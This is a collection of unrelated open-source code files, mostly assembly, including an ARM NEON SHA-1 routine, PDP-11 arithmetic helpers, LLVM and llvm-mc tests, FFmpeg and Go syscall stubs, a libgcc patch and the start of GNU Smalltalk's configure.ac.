add r7,r7,r11
vext.8 q12,q3,q8,#8
eor r10,r3,r5
add r6,r6,r9
ldr r9,[sp,#20]
veor q9,q9,q1
eor r11,r10,r4
add r6,r6,r7,ror#27
veor q9,q9,q10
mov r3,r3,ror#2
add r6,r6,r11
vadd.i32 q13,q8,q14
eor r10,r7,r4
add r5,r5,r9
veor q12,q12,q9
ldr r9,[sp,#24]
eor r11,r10,r3
vshr.u32 q9,q12,#30
add r5,r5,r6,ror#27
mov r7,r7,ror#2
vst1.32 {q13},[r12,:128]!
add r5,r5,r11
eor r10,r6,r3
vsli.32 q9,q12,#2
add r4,r4,r9
ldr r9,[sp,#28]
eor r11,r10,r7
add r4,r4,r5,ror#27
mov r6,r6,ror#2
add r4,r4,r11
eor r10,r5,r7
add r3,r3,r9
ldr r9,[sp,#32]
eor r11,r10,r6
add r3,r3,r4,ror#27
mov r5,r5,ror#2
add r3,r3,r11
vext.8 q12,q8,q9,#8
add r7,r7,r9
and r10,r5,r6
ldr r9,[sp,#36]
veor q10,q10,q2
add r7,r7,r3,ror#27
eor r11,r5,r6
veor q10,q10,q11
add r7,r7,r10
and r11,r11,r4
vadd.i32 q13,q9,q14
mov r4,r4,ror#2
add r7,r7,r11
veor q12,q12,q10
add r6,r6,r9
and r10,r4,r5
vshr.u32 q10,q12,#30
ldr r9,[sp,#40]
add r6,r6,r7,ror#27
vst1.32 {q13},[r12,:128]!
eor r11,r4,r5
add r6,r6,r10
vsli.32 q10,q12,#2
and r11,r11,r3
mov r3,r3,ror#2
add r6,r6,r11
add r5,r5,r9
and r10,r3,r4
ldr r9,[sp,#44]
add r5,r5,r6,ror#27
eor r11,r3,r4
add r5,r5,r10
and r11,r11,r7
mov r7,r7,ror#2
add r5,r5,r11
add r4,r4,r9
and r10,r7,r3
ldr r9,[sp,#48]
add r4,r4,r5,ror#27
eor r11,r7,r3
add r4,r4,r10
and r11,r11,r6
mov r6,r6,ror#2
add r4,r4,r11
vext.8 q12,q9,q10,#8
add r3,r3,r9
and r10,r6,r7
ldr r9,[sp,#52]
veor q11,q11,q3
add r3,r3,r4,ror#27
eor r11,r6,r7
veor q11,q11,q0
add r3,r3,r10
and r11,r11,r5
vadd.i32 q13,q10,q14
mov r5,r5,ror#2
vld1.32 {d28[],d29[]},[r8,:32]!
add r3,r3,r11
veor q12,q12,q11
add r7,r7,r9
and r10,r5,r6
vshr.u32 q11,q12,#30
ldr r9,[sp,#56]
add r7,r7,r3,ror#27
vst1.32 {q13},[r12,:128]!
eor r11,r5,r6
add r7,r7,r10
vsli.32 q11,q12,#2
and r11,r11,r4
mov r4,r4,ror#2
add r7,r7,r11
add r6,r6,r9
and r10,r4,r5
ldr r9,[sp,#60]
add r6,r6,r7,ror#27
eor r11,r4,r5
add r6,r6,r10
and r11,r11,r3
mov r3,r3,ror#2
add r6,r6,r11
add r5,r5,r9
and r10,r3,r4
ldr r9,[sp,#0]
add r5,r5,r6,ror#27
eor r11,r3,r4
add r5,r5,r10
and r11,r11,r7
mov r7,r7,ror#2
add r5,r5,r11
vext.8 q12,q10,q11,#8
add r4,r4,r9
and r10,r7,r3
ldr r9,[sp,#4]
veor q0,q0,q8
add r4,r4,r5,ror#27
eor r11,r7,r3
veor q0,q0,q1
add r4,r4,r10
and r11,r11,r6
vadd.i32 q13,q11,q14
mov r6,r6,ror#2
add r4,r4,r11
veor q12,q12,q0
add r3,r3,r9
and r10,r6,r7
vshr.u32 q0,q12,#30
ldr r9,[sp,#8]
add r3,r3,r4,ror#27
vst1.32 {q13},[r12,:128]!
sub r12,r12,#64
eor r11,r6,r7
add r3,r3,r10
vsli.32 q0,q12,#2
and r11,r11,r5
mov r5,r5,ror#2
add r3,r3,r11
add r7,r7,r9
and r10,r5,r6
ldr r9,[sp,#12]
add r7,r7,r3,ror#27
eor r11,r5,r6
add r7,r7,r10
and r11,r11,r4
mov r4,r4,ror#2
add r7,r7,r11
add r6,r6,r9
and r10,r4,r5
ldr r9,[sp,#16]
add r6,r6,r7,ror#27
eor r11,r4,r5
add r6,r6,r10
and r11,r11,r3
mov r3,r3,ror#2
add r6,r6,r11
vext.8 q12,q11,q0,#8
add r5,r5,r9
and r10,r3,r4
ldr r9,[sp,#20]
veor q1,q1,q9
add r5,r5,r6,ror#27
eor r11,r3,r4
veor q1,q1,q2
add r5,r5,r10
and r11,r11,r7
vadd.i32 q13,q0,q14
mov r7,r7,ror#2
add r5,r5,r11
veor q12,q12,q1
add r4,r4,r9
and r10,r7,r3
vshr.u32 q1,q12,#30
ldr r9,[sp,#24]
add r4,r4,r5,ror#27
vst1.32 {q13},[r12,:128]!
eor r11,r7,r3
add r4,r4,r10
vsli.32 q1,q12,#2
and r11,r11,r6
mov r6,r6,ror#2
add r4,r4,r11
add r3,r3,r9
and r10,r6,r7
ldr r9,[sp,#28]
add r3,r3,r4,ror#27
eor r11,r6,r7
add r3,r3,r10
and r11,r11,r5
mov r5,r5,ror#2
add r3,r3,r11
add r7,r7,r9
and r10,r5,r6
ldr r9,[sp,#32]
add r7,r7,r3,ror#27
eor r11,r5,r6
add r7,r7,r10
and r11,r11,r4
mov r4,r4,ror#2
add r7,r7,r11
vext.8 q12,q0,q1,#8
add r6,r6,r9
and r10,r4,r5
ldr r9,[sp,#36]
veor q2,q2,q10
add r6,r6,r7,ror#27
eor r11,r4,r5
veor q2,q2,q3
add r6,r6,r10
and r11,r11,r3
vadd.i32 q13,q1,q14
mov r3,r3,ror#2
add r6,r6,r11
veor q12,q12,q2
add r5,r5,r9
and r10,r3,r4
vshr.u32 q2,q12,#30
ldr r9,[sp,#40]
add r5,r5,r6,ror#27
vst1.32 {q13},[r12,:128]!
eor r11,r3,r4
add r5,r5,r10
vsli.32 q2,q12,#2
and r11,r11,r7
mov r7,r7,ror#2
add r5,r5,r11
add r4,r4,r9
and r10,r7,r3
ldr r9,[sp,#44]
add r4,r4,r5,ror#27
eor r11,r7,r3
add r4,r4,r10
and r11,r11,r6
mov r6,r6,ror#2
add r4,r4,r11
add r3,r3,r9
and r10,r6,r7
ldr r9,[sp,#48]
add r3,r3,r4,ror#27
eor r11,r6,r7
add r3,r3,r10
and r11,r11,r5
mov r5,r5,ror#2
add r3,r3,r11
vext.8 q12,q1,q2,#8
eor r10,r4,r6
add r7,r7,r9
ldr r9,[sp,#52]
veor q3,q3,q11
eor r11,r10,r5
add r7,r7,r3,ror#27
veor q3,q3,q8
mov r4,r4,ror#2
add r7,r7,r11
vadd.i32 q13,q2,q14
eor r10,r3,r5
add r6,r6,r9
veor q12,q12,q3
ldr r9,[sp,#56]
eor r11,r10,r4
vshr.u32 q3,q12,#30
add r6,r6,r7,ror#27
mov r3,r3,ror#2
vst1.32 {q13},[r12,:128]!
add r6,r6,r11
eor r10,r7,r4
vsli.32 q3,q12,#2
add r5,r5,r9
ldr r9,[sp,#60]
eor r11,r10,r3
add r5,r5,r6,ror#27
mov r7,r7,ror#2
add r5,r5,r11
eor r10,r6,r3
add r4,r4,r9
ldr r9,[sp,#0]
eor r11,r10,r7
add r4,r4,r5,ror#27
mov r6,r6,ror#2
add r4,r4,r11
vadd.i32 q13,q3,q14
eor r10,r5,r7
add r3,r3,r9
vst1.32 {q13},[r12,:128]!
sub r12,r12,#64
teq r1,r2
sub r8,r8,#16
it eq
subeq r1,r1,#64
vld1.8 {q0,q1},[r1]!
ldr r9,[sp,#4]
eor r11,r10,r6
vld1.8 {q2,q3},[r1]!
add r3,r3,r4,ror#27
mov r5,r5,ror#2
vld1.32 {d28[],d29[]},[r8,:32]!
add r3,r3,r11
eor r10,r4,r6
vrev32.8 q0,q0
add r7,r7,r9
ldr r9,[sp,#8]
eor r11,r10,r5
add r7,r7,r3,ror#27
mov r4,r4,ror#2
add r7,r7,r11
eor r10,r3,r5
add r6,r6,r9
ldr r9,[sp,#12]
eor r11,r10,r4
add r6,r6,r7,ror#27
mov r3,r3,ror#2
add r6,r6,r11
eor r10,r7,r4
add r5,r5,r9
ldr r9,[sp,#16]
eor r11,r10,r3
add r5,r5,r6,ror#27
mov r7,r7,ror#2
add r5,r5,r11
vrev32.8 q1,q1
eor r10,r6,r3
add r4,r4,r9
vadd.i32 q8,q0,q14
ldr r9,[sp,#20]
eor r11,r10,r7
vst1.32 {q8},[r12,:128]!
add r4,r4,r5,ror#27
mov r6,r6,ror#2
add r4,r4,r11
eor r10,r5,r7
add r3,r3,r9
ldr r9,[sp,#24]
eor r11,r10,r6
add r3,r3,r4,ror#27
mov r5,r5,ror#2
add r3,r3,r11
eor r10,r4,r6
add r7,r7,r9
ldr r9,[sp,#28]
eor r11,r10,r5
add r7,r7,r3,ror#27
mov r4,r4,ror#2
add r7,r7,r11
eor r10,r3,r5
add r6,r6,r9
ldr r9,[sp,#32]
eor r11,r10,r4
add r6,r6,r7,ror#27
mov r3,r3,ror#2
add r6,r6,r11
vrev32.8 q2,q2
eor r10,r7,r4
add r5,r5,r9
vadd.i32 q9,q1,q14
ldr r9,[sp,#36]
eor r11,r10,r3
vst1.32 {q9},[r12,:128]!
add r5,r5,r6,ror#27
mov r7,r7,ror#2
add r5,r5,r11
eor r10,r6,r3
add r4,r4,r9
ldr r9,[sp,#40]
eor r11,r10,r7
add r4,r4,r5,ror#27
mov r6,r6,ror#2
add r4,r4,r11
eor r10,r5,r7
add r3,r3,r9
ldr r9,[sp,#44]
eor r11,r10,r6
add r3,r3,r4,ror#27
mov r5,r5,ror#2
add r3,r3,r11
eor r10,r4,r6
add r7,r7,r9
ldr r9,[sp,#48]
eor r11,r10,r5
add r7,r7,r3,ror#27
mov r4,r4,ror#2
add r7,r7,r11
vrev32.8 q3,q3
eor r10,r3,r5
add r6,r6,r9
vadd.i32 q10,q2,q14
ldr r9,[sp,#52]
eor r11,r10,r4
vst1.32 {q10},[r12,:128]!
add r6,r6,r7,ror#27
mov r3,r3,ror#2
add r6,r6,r11
eor r10,r7,r4
add r5,r5,r9
ldr r9,[sp,#56]
eor r11,r10,r3
add r5,r5,r6,ror#27
mov r7,r7,ror#2
add r5,r5,r11
eor r10,r6,r3
add r4,r4,r9
ldr r9,[sp,#60]
eor r11,r10,r7
add r4,r4,r5,ror#27
mov r6,r6,ror#2
add r4,r4,r11
eor r10,r5,r7
add r3,r3,r9
eor r11,r10,r6
add r3,r3,r4,ror#27
mov r5,r5,ror#2
add r3,r3,r11
ldmia r0,{r9,r10,r11,r12} @ accumulate context
add r3,r3,r9
ldr r9,[r0,#16]
add r4,r4,r10
add r5,r5,r11
add r6,r6,r12
it eq
moveq sp,r14
add r7,r7,r9
it ne
ldrne r9,[sp]
stmia r0,{r3,r4,r5,r6,r7}
itt ne
addne r12,sp,#3*16
bne .Loop_neon
@ vldmia sp!,{d8-d15}
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,pc}
.size sha1_block_data_order_neon,.-sha1_block_data_order_neon
#endif
| {
"language": "Assembly"
} |
--- libgcc/config/t-hardfp-sf.orig 2019-06-06 21:40:23 UTC
+++ libgcc/config/t-hardfp-sf
@@ -0,0 +1,32 @@
+# Copyright (C) 2014 Free Software Foundation, Inc.
+
+# This file is part of GCC.
+
+# GCC is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation; either version 3, or (at your option)
+# any later version.
+
+# GCC is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+
+# You should have received a copy of the GNU General Public License
+# along with GCC; see the file COPYING3. If not see
+# <http://www.gnu.org/licenses/>.
+
+hardfp_float_modes := sf
+# di and ti are provided by libgcc2.c where needed.
+hardfp_int_modes := si
+hardfp_extensions :=
+hardfp_truncations :=
+
+# Emulate 64 bit float:
+FPBIT = true
+DPBIT = true
+# Don't build functions handled by 32 bit hardware:
+LIB2FUNCS_EXCLUDE = _addsub_sf _mul_sf _div_sf \
+ _fpcmp_parts_sf _compare_sf _eq_sf _ne_sf _gt_sf _ge_sf \
+ _lt_sf _le_sf _unord_sf _si_to_sf _sf_to_si _negate_sf \
+ _thenan_sf _sf_to_usi _usi_to_sf
| {
"language": "Assembly"
} |
; STUFF - Very basic useful stuff -*-PALX-*-
stvn==%fnam2
.sbttl Register save/restore routines
; SAVE6 routine saves R0 through R5 on stack, R0 at top:
; SP -> R0
; R1
; R2
; R3
; R4
; R5
; Call by JSR R5,SAVE6. Restore regs by REST6 routine.
save6: push r4,r3,r2,r1,r0 ; R5 already on stack by JSR.
jmp (r5) ; return.
; REST6 routine restores R0 through R5 from stack, where
; R0 is considered to be the top word of the stack (which is
; how SAVE6 pushes the registers). Call by JSR R5,REST6.
; REST6 returns with the 6 words popped off the stack.
rest6: tst (sp)+ ; forget old R5 contents.
pop r0,r1,r2,r3,r4 ; restore other regs.
rts r5 ; return and restore R5.
.sbttl Multiply & Divide
.if eq eis
; MUL1 multiplies two integers, producing a single precision product. Both the
; multiplicand and multiplier are treated as signed numbers. This routine is
; meant to be compatible with the single precision multiply instruction found
; on reasonable PDP11s.
; ARGS: VALS:
; SP -> A SP -> P
; B
mul1: push r1,r2 ; save regs
mov 6(sp),r1 ; multiplicand
mov 10(sp),r2 ; multiplier
clr 10(sp) ; clear product accumulator
loop < ror r2 ; divide multiplier by 2, testing lowest bit
exitl eq ; nothing left
if cs,<
add r1,10(sp) ; if bit is 1 then add multiplicand to product
>
asl r1 ; double multiplicand
clc ; so ROR is logical shift
rptl ; and repeat.
>
if cs,<
add r1,10(sp) ; one last add necessary if low bit was 1
>
pop r2,r1,(sp) ; restore regs, remove arg2 from stack
rts r5
; MUL2 is multiplies two integers producing a double precision product. Both
; the multiplicand and multiplier are treated as signed numbers. This routine
; is meant to be compatible with the double precision multiply instruction
; found on reasonable PDP11s.
; ARGS: VALS:
; SP -> multiplicand SP -> P hi
; multiplier P lo
mul2: push r0,r1,r2 ; save regs
clr r0 ; multiplicand
mov 10(sp),r1 ; ...
if mi,<
com r0 ; if low part negative set high part to -1
>
mov 12(sp),r2 ; multiplier
if mi,<
neg r2 ; negate multiplier and multiplicand
neg r0 ; double word negate
neg r1 ; ...
sbc r0 ; ...
>
clr 10(sp) ; clear product accumulator
clr 12(sp) ; ...
loop < asr r2 ; divide multiplier by 2, testing lowest bit
exitl eq ; nothing left
if cs,<
add r1,12(sp) ; if bit is 1 then add multiplicand to product
adc 10(sp) ; ...
add r0,10(sp) ; ...
>
asl r1 ; double multiplicand
rol r0 ; ...
rptl
>
if cs,<
add r1,12(sp) ; one last add necessary if low bit was 1
adc 10(sp) ; ...
add r0,10(sp)
>
pop r2,r1,r0 ; restore regs
rts r5
; DIV2 divides a double word quantity by a single word quantity yielding a
; quotient and remainder. It is meant to simulate the DIV instruction found
; on reasonable 11s.
; ARGS: VALS:
; SP -> divisor SP -> remainder
; dividend lo quotient
; dividend hi
div2: jsr r5,save6 ; save regs
mov 22(sp),r0 ; dividend hi
mov 20(sp),r1 ; dividend lo
mov 16(sp),r2 ; divisor
if mi,<
neg r2 ; negate divisor and dividend
neg r0 ; double word negate
neg r1 ; ...
sbc r0 ; ...
>
clr r3
mov #16.,r4
loop < asl r3
rol r1
rol r0
cmp r2,r0
if le,<
sub r2,r0
inc r3
>
sorl r4
>
mov r3,22(sp)
mov r0,20(sp)
jsr r5,rest6
pop (sp)
rts r5
.endc ; eq eis
; DMUL performs double precision multiplication. Both multiplicand and
; multiplier are treated as unsigned integers. This routine is necessary
; because the PDP11 multiply instruction is too crufty for some things.
; ARGS: VALS:
; R0,R1: multiplicand R0,R1: product
; R2: multiplier
dmul: push r3,r4 ; save regs
mov r0,r3 ; copy multiplicand
mov r1,r4 ; ...
clr r0 ; clear product accumulator
clr r1 ; ...
loop < clc ; clear carry so ROR is logical shift
ror r2 ; divide multiplier by 2, testing lowest bit
exitl eq ; nothing left
if cs,<
add r4,r1 ; if bit is 1 then add multiplicand to product
adc r0 ; ...
add r3,r0 ; ...
>
asl r4 ; double multiplicand
rol r3 ; ...
rptl
>
if cs,<
add r4,r1 ; one last add necessary if low bit was 1
adc r0 ; ...
add r3,r0 ; ...
>
pop r4,r3 ; restore regs
rts r5
; DDIV performs double precision division. It is best suited to dividing
; double precision no.s by some constant. Both dividend and divisor are
; treated as unsigned integers. This routine is necessary because the PDP11
; divide instruction is too crufty for just about anything.
; ARGS: VALS:
; R0,R1: dividend R0,R1: quotient
; R2,R3: divisor normalized R2: remainder
; R4,R5: 1 shifted same
; Note: DDIV is called by JSR PC,DDIV.
ddiv: clr -(sp) ; start quotient at 0
clr -(sp) ; ...
loop < cmp r2,r0
blo 1$
if eq,<
cmp r3,r1
if los,<
1$: sub r3,r1 ; subtract from dividend
sbc r0
sub r2,r0
bis r4,2(sp)
bis r5,(sp)
>
>
clc
ror r2
ror r3
asr r4
ror r5
rptl ne
tst r4
rptl ne
>
mov r1,r2 ; put remainder in r2
pop r1,r0 ; put quotient in r0,r1
rts pc
; DIV10 divides r0,r1 by 10, remainder in r2. Clobbers r3, r4, and r5.
; Call with JSR PC,DDIV10.
ddiv10: mov #120000,r2 ; 10 normalized
clr r3 ; ...
mov #10000,r4 ; 1 shifted same amount as 10
clr r5 ; ...
jmp ddiv ; jump to common double precision divide
; DIV24 divides r0,r1 by 24, remainder in r2. Clobbers r3, r4, and r5.
; Call with JSR PC,DDIV24.
ddiv24: mov #140000,r2 ; 24 normalized
clr r3 ; ...
mov #4000,r4 ; 1 shifted same amount as 24
clr r5 ; ...
jmp ddiv ; call common double precision divide
; DIV60 divides r0,r1 by 60, remainder in r2. Clobbers r3, r4, and r5.
; Call with JSR PC,DDIV60.
ddiv60: mov #170000,r2 ; 60 normalized
clr r3 ; ...
mov #2000,r4 ; 1 shifted same amount as 60
clr r5 ; ...
jmp ddiv ; call common double precision divide
.sbttl random things
bits: .byte 1,2,4,10,20,40,100,200
.if ne ndz
ifMIT <
; DZ11 line parameters
; 10000=Reciever clock on
; 7400=speed, 4 bits: low order bits
; 00 01 10 11
; ----------------------
; high 00| 50 75 110 134.5
; order 01| 150 300 600 1200
; bits 10| 1800 2000 2400 3600
; 11| 4800 7200 9600 19.2K
; 200=odd parity
; 100=parity enabled
; 40=stop code (on is 2 stop bits)
; 30=character length, excluding parity, 00=5,01=6,10=7,11=8
; 7=line number
dzlpar: 17120 ; line 0: 9600 baud, even parity, 7 bits (SB)
17121 ; line 1: 9600 baud, even parity, 7 bits (VT52 #1)
17122 ; line 2: 9600 baud, even parity, 7 bits (VT52 #2)
17123 ; line 5: 9600 baud, even parity, 7 bits (VT52 #3)
13524 ; line 3: 1200 baud, even parity, 7 bits (HP2645)
13525 ; line 4: 1200 baud, even parity, 7 bits (Vadic 1200)
15036 ; line 6: 2400 baud, no parity, 8 bits (HP3000)
17037 ; line 7: 9600 baud, no parity, 8 bits (MC)
>
.endc ; if DZ | {
"language": "Assembly"
} |
; NOTE: Assertions have been autogenerated by utils/update_test_checks.py
; RUN: opt %s -instcombine -S | FileCheck %s
declare void @llvm.assume(i1)
declare i8 @gen8()
declare void @use8(i8)
define i1 @t0(i8 %base, i8 %offset) {
; CHECK-LABEL: @t0(
; CHECK-NEXT: [[CMP:%.*]] = icmp slt i8 [[OFFSET:%.*]], 0
; CHECK-NEXT: call void @llvm.assume(i1 [[CMP]])
; CHECK-NEXT: [[ADJUSTED:%.*]] = sub i8 [[BASE:%.*]], [[OFFSET]]
; CHECK-NEXT: call void @use8(i8 [[ADJUSTED]])
; CHECK-NEXT: [[RES:%.*]] = icmp uge i8 [[BASE]], [[OFFSET]]
; CHECK-NEXT: ret i1 [[RES]]
;
%cmp = icmp slt i8 %offset, 0
call void @llvm.assume(i1 %cmp)
%adjusted = sub i8 %base, %offset
call void @use8(i8 %adjusted)
%res = icmp ult i8 %adjusted, %base
ret i1 %res
}
define i1 @t1(i8 %base, i8 %offset) {
; CHECK-LABEL: @t1(
; CHECK-NEXT: [[CMP:%.*]] = icmp slt i8 [[OFFSET:%.*]], 0
; CHECK-NEXT: call void @llvm.assume(i1 [[CMP]])
; CHECK-NEXT: [[ADJUSTED:%.*]] = sub i8 [[BASE:%.*]], [[OFFSET]]
; CHECK-NEXT: call void @use8(i8 [[ADJUSTED]])
; CHECK-NEXT: [[RES:%.*]] = icmp ult i8 [[BASE]], [[OFFSET]]
; CHECK-NEXT: ret i1 [[RES]]
;
%cmp = icmp slt i8 %offset, 0
call void @llvm.assume(i1 %cmp)
%adjusted = sub i8 %base, %offset
call void @use8(i8 %adjusted)
%res = icmp uge i8 %adjusted, %base
ret i1 %res
}
define i1 @t2(i8 %offset) {
; CHECK-LABEL: @t2(
; CHECK-NEXT: [[CMP:%.*]] = icmp slt i8 [[OFFSET:%.*]], 0
; CHECK-NEXT: call void @llvm.assume(i1 [[CMP]])
; CHECK-NEXT: [[BASE:%.*]] = call i8 @gen8()
; CHECK-NEXT: [[ADJUSTED:%.*]] = sub i8 [[BASE]], [[OFFSET]]
; CHECK-NEXT: call void @use8(i8 [[ADJUSTED]])
; CHECK-NEXT: [[RES:%.*]] = icmp uge i8 [[BASE]], [[OFFSET]]
; CHECK-NEXT: ret i1 [[RES]]
;
%cmp = icmp slt i8 %offset, 0
call void @llvm.assume(i1 %cmp)
%base = call i8 @gen8()
%adjusted = sub i8 %base, %offset
call void @use8(i8 %adjusted)
%res = icmp ugt i8 %base, %adjusted
ret i1 %res
}
define i1 @t3(i8 %offset) {
; CHECK-LABEL: @t3(
; CHECK-NEXT: [[CMP:%.*]] = icmp slt i8 [[OFFSET:%.*]], 0
; CHECK-NEXT: call void @llvm.assume(i1 [[CMP]])
; CHECK-NEXT: [[BASE:%.*]] = call i8 @gen8()
; CHECK-NEXT: [[ADJUSTED:%.*]] = sub i8 [[BASE]], [[OFFSET]]
; CHECK-NEXT: call void @use8(i8 [[ADJUSTED]])
; CHECK-NEXT: [[RES:%.*]] = icmp ult i8 [[BASE]], [[OFFSET]]
; CHECK-NEXT: ret i1 [[RES]]
;
%cmp = icmp slt i8 %offset, 0
call void @llvm.assume(i1 %cmp)
%base = call i8 @gen8()
%adjusted = sub i8 %base, %offset
call void @use8(i8 %adjusted)
%res = icmp ule i8 %base, %adjusted
ret i1 %res
}
; Here we don't know that offset is non-zero. Can't fold.
define i1 @n4_maybezero(i8 %base, i8 %offset) {
; CHECK-LABEL: @n4_maybezero(
; CHECK-NEXT: [[ADJUSTED:%.*]] = sub i8 [[BASE:%.*]], [[OFFSET:%.*]]
; CHECK-NEXT: call void @use8(i8 [[ADJUSTED]])
; CHECK-NEXT: [[RES:%.*]] = icmp ult i8 [[ADJUSTED]], [[BASE]]
; CHECK-NEXT: ret i1 [[RES]]
;
%adjusted = sub i8 %base, %offset
call void @use8(i8 %adjusted)
%res = icmp ult i8 %adjusted, %base
ret i1 %res
}
; We need to know that about %offset, %base won't do. Can't fold.
define i1 @n5_wrongnonzero(i8 %base, i8 %offset) {
; CHECK-LABEL: @n5_wrongnonzero(
; CHECK-NEXT: [[CMP:%.*]] = icmp sgt i8 [[BASE:%.*]], 0
; CHECK-NEXT: call void @llvm.assume(i1 [[CMP]])
; CHECK-NEXT: [[ADJUSTED:%.*]] = sub i8 [[BASE]], [[OFFSET:%.*]]
; CHECK-NEXT: call void @use8(i8 [[ADJUSTED]])
; CHECK-NEXT: [[RES:%.*]] = icmp ult i8 [[ADJUSTED]], [[BASE]]
; CHECK-NEXT: ret i1 [[RES]]
;
%cmp = icmp sgt i8 %base, 0
call void @llvm.assume(i1 %cmp)
%adjusted = sub i8 %base, %offset
call void @use8(i8 %adjusted)
%res = icmp ult i8 %adjusted, %base
ret i1 %res
}
| {
"language": "Assembly"
} |
# Check that .sdata and .sbss sections have SHF_MIPS_GPREL flags
# and proper section types.
# RUN: llvm-mc -filetype=obj -triple=mips-unknown-linux %s -o - \
# RUN: | llvm-readobj -s | FileCheck %s
.sdata
.word 0
.sbss
.zero 4
# CHECK: Name: .sdata
# CHECK-NEXT: Type: SHT_PROGBITS
# CHECK-NEXT: Flags [ (0x10000003)
# CHECK-NEXT: SHF_ALLOC
# CHECK-NEXT: SHF_MIPS_GPREL
# CHECK-NEXT: SHF_WRITE
# CHECK-NEXT: ]
# CHECK: Name: .sbss
# CHECK-NEXT: Type: SHT_NOBITS
# CHECK-NEXT: Flags [ (0x10000003)
# CHECK-NEXT: SHF_ALLOC
# CHECK-NEXT: SHF_MIPS_GPREL
# CHECK-NEXT: SHF_WRITE
# CHECK-NEXT: ]
| {
"language": "Assembly"
} |
.globl _start
.text
_start:
xorl %eax, %eax
incl %eax
movb $0, %bl
int $0x80
| {
"language": "Assembly"
} |
/*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/aarch64/asm.S"
function ff_prefetch_aarch64, export=1
subs w2, w2, #2
prfm pldl1strm, [x0]
prfm pldl1strm, [x0, x1]
add x0, x0, x1, lsl #1
b.gt X(ff_prefetch_aarch64)
ret
endfunc
| {
"language": "Assembly"
} |
// Copyright 2009 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build !gccgo
#include "textflag.h"
//
// System calls for 386, Linux
//
// Just jump to package syscall's implementation for all these functions.
// The runtime may know about them.
TEXT ·Syscall(SB),NOSPLIT,$0-28
JMP syscall·Syscall(SB)
TEXT ·Syscall6(SB),NOSPLIT,$0-40
JMP syscall·Syscall6(SB)
TEXT ·RawSyscall(SB),NOSPLIT,$0-28
JMP syscall·RawSyscall(SB)
TEXT ·RawSyscall6(SB),NOSPLIT,$0-40
JMP syscall·RawSyscall6(SB)
TEXT ·socketcall(SB),NOSPLIT,$0-36
JMP syscall·socketcall(SB)
TEXT ·rawsocketcall(SB),NOSPLIT,$0-36
JMP syscall·rawsocketcall(SB)
TEXT ·seek(SB),NOSPLIT,$0-28
JMP syscall·seek(SB)
| {
"language": "Assembly"
} |
dnl Hey Emacs, I want this in -*- Autoconf -*- mode, please.
dnl ---
dnl Copyright 1992-2009 Free Software Foundation, Inc.
dnl Please see COPYING for a description your rights and responsibilities
dnl with this software.
dnl Process this file with autoconf to produce a configure script.
dnl 2.63 needed by testsuite, actually
AC_PREREQ(2.63)
AC_INIT([GNU Smalltalk], 3.2.90, [email protected], smalltalk,
[http://smalltalk.gnu.org/])
MAINTAINER="[email protected]"
m4_ifdef([AM_SILENT_RULES], [AM_SILENT_RULES([yes])])
dnl CURRENT:REVISION:AGE means this is the REVISION-th version of
dnl the CURRENT-th interface; all the interface from CURRENT-AGE
dnl to CURRENT are supported.
GST_REVISION(8:3:1)
AC_CONFIG_AUX_DIR([build-aux])
AC_CONFIG_MACRO_DIR([build-aux])
AC_CONFIG_SRCDIR([main.c])
AC_CONFIG_TESTDIR(tests)
AC_CONFIG_HEADERS([config.h])
GST_PROG_GAWK
AM_INIT_AUTOMAKE
AC_CANONICAL_HOST
if test -d $srcdir/.git; then
GIT_REVISION=-`git rev-parse --short HEAD 2>/dev/null || echo git`
else
GIT_REVISION=
fi
AC_DEFINE_UNQUOTED([PACKAGE_GIT_REVISION], ["$GIT_REVISION"],
[The git version that GNU Smalltalk was compiled from.])
RSE_BOLD
dnl
dnl ------------------------------- PROGRAMS ------------------
{ echo; echo "${term_bold}Build Tools:${term_norm}"; } >& AS_MESSAGE_FD
GST_PROG_CC(strict-aliasing, dnl enabled optimizations
gcse, dnl disabled optimizations
all write-strings pointer-arith declaration-after-statement, dnl enabled warnings
strict-aliasing pointer-sign long-double format switch) dnl disabled warnings
if test "$GCC" != yes; then
AC_MSG_ERROR([Please use GCC to compile GNU Smalltalk.])
fi
case "$host" in
alpha*-*-*) CFLAGS="$CFLAGS -mieee" ;;
esac
# We don't require Automake 1.10, so invoke _AM_DEPENDENCIES manually. And
# since we actually use Objective-C only on Mac OS (for libsdl), for now we
# get by with using gcc as an Objective-C compiler.
AC_SUBST(OBJC, [$CC])
AC_SUBST(OBJCFLAGS, [$CFLAGS])
_AM_DEPENDENCIES(OBJC)
AC_PROG_SED
AC_PROG_LN_S
GST_PROG_LN
PKG_PROG_PKG_CONFIG
AC_PATH_TOOL(WINDRES, windres, no)
AC_PATH_PROG(INSTALL_INFO, install-info, :, $PATH:/sbin:/usr/sbin)
AC_PATH_PROG(ZIP, zip, no, $PATH)
AC_CHECK_PROG(TIMEOUT, timeout, [timeout 600s], [env])
if test "$ZIP" = no; then
AC_MSG_ERROR([Please install InfoZIP to use GNU Smalltalk.])
fi
# For Wine, compile in GST a generic path to zip.exe. For build time,
# wrap the native zip with winewrapper to hide Windows paths from it.
GST_WINE_IF([WINEWRAPPERDEP='winewrapper$(EXEEXT)'
WINEWRAPPER='$(abs_top_builddir)/winewrapper$(EXEEXT)'
XZIP='$(WINEWRAPPER) '$ZIP
ZIP=zip.exe,
AC_CONFIG_FILES([makesetup], [chmod +x makesetup])],
[WINEWRAPPER=
WINEWRAPPERDEP=
XZIP=$ZIP])
AC_SUBST([WINEWRAPPER])
AC_SUBST([WINEWRAPPERDEP])
AC_SUBST([XZIP])
AC_ARG_WITH(emacs,
[ --without-emacs disable Emacs modes for Smalltalk], ,
with_emacs=yes)
test "$with_emacs" = no && EMACS=no
